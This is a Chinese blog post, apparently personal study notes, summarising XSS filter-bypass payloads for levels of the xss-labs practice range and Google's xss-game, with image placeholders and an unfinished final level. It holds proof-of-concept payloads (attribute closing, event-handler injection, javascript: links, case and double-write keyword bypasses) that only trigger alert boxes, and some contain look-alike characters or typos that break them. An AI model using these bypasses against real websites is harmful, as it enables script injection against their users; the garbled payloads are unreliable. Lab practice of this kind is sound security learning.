xss漏洞总结【插入位置】

明天再更新:

使用靶场:xss-labs、https://xss-game.appspot.com

XSS可能出现的地方:

  • url的地址栏:
  • 搜索框:
  • 留言板:

绕过方法:

靶场:xss-labs

位置一:URL里

在这里插入图片描述

位置二:搜索框中

html属性中作为值;绕过方法:闭合。

"><script>alert(1)</script>

在这里插入图片描述

位置三:搜索框中

如下图:'' 其中单引号被替换成双引号,特殊字符也被实体编码了。

特殊字符被过滤,但不对单引号转义,因此利用单引号闭合构造事件

'οnclick='alert(1)''

或者

'οnfοcus=alert('xss') >//

在这里插入图片描述

位置四:搜索框
尖括号被过滤了,所有考虑事件触发,用双引号闭合value属性。

"οnclick='alert(1)'"  或者:"οnfοcus='alert(1)'""οnfοcus=javascript:alert('xss') " // 或者"οnclick=javascript:alert('xss') " //

在这里插入图片描述

在这里插入图片描述

位置五:
特殊字符被替代,换标签继续:

"><a href=jiavascript:alert('1')>2</a>//
">:闭合前面标签。
<a href=javascript:alert('1')>2</a>:点击数字2,跳转到href执行弹窗命令。
//:注释后面的“>。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

位置六:搜索框
关键字过滤了:href、script、on
大小写绕过:"oNclick='alert(1)'" 使用双引号进行闭合。

"oNclick='alert(1)'"
或者"Onclick=javascript:alert('xss') " //
或者 "> <a HrEf=javascript:alert('xss') > xss</a> //

位置七:搜索框
关键字被删除,尝试双写

"onοnclick=javascript:alert('xss') " //

在这里插入图片描述

靶场:https://xss-game.appspot.com/

第一关:地址栏中:

也可以使用反斜号绕过,遇到“()”被屏蔽时可以使用这种方式。${String}这是ES6新增的模板字符串方法新特性。

第二关:发布帖子:
xss

第三关:


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部